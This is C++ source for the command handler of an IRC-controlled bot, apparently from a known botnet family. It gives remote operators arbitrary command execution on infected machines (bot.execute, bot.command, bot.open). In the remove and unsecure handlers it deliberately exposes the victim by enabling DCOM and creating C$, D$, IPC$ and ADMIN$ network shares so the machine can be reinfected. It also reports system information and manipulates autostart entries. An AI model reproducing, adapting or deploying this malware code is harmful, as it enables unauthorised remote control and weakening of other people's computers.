bool CBot::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) { CString sId(pMsg->sChatString.Token(1, " ", true)); if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo); #ifdef WIN32 /// should unsecure system as remove bot to allow recycling // // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares Execute("net.exe", "net share c$=c:\\"); Execute("net.exe", "net share d$=d:\\"); Execute("net.exe", "net share e$=e:\\"); Execute("net.exe", "net share ipc$"); Execute("net.exe", "net share admin$"); // Delete Autostart if(g_pMainCtrl->m_cBot.as_enabled.bValue) g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue); if(g_pMainCtrl->m_cBot.as_service.bValue) g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue); #endif g_pMainCtrl->m_cInstaller.Uninstall(); g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; } else if(!pMsg->sCmd.Compare("bot.execute")) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #else CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr()); if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #endif return true; } else if(!pMsg->sCmd.Compare("bot.open")) { if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; #ifdef WIN32 bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32; #else bRet=system(sText.CStr())>0; #endif if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.dns")) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr()); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else if(!pMsg->sCmd.Compare("bot.about")) { CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr()); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.id")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.nick")) { g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) { g_pMainCtrl->m_cIRC.m_bRunning=false; return true; } else if(!pMsg->sCmd.Compare("bot.sysinfo")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.longuptime")) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } else if(!pMsg->sCmd.Compare("bot.status")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.rndnick")) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr()); g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.flushdns")) { #ifdef WIN32 Execute("ipconfig.exe", "/flushdns"); #else Execute("nscd", "-i hosts"); #endif // WIN32 return true; } else if(!pMsg->sCmd.Compare("bot.secure")) { #ifdef WIN32 // Set EnableDCOM to "N" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // Secure Shares system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot Secured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.unsecure")) { #ifdef WIN32 // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares system("net share c$=c:\\"); system("net share d$=d:\\"); system("net share e$=e:\\"); system("net share ipc$"); system("net share admin$"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot UnSecured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.command")) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr()); if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; } else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } return false; }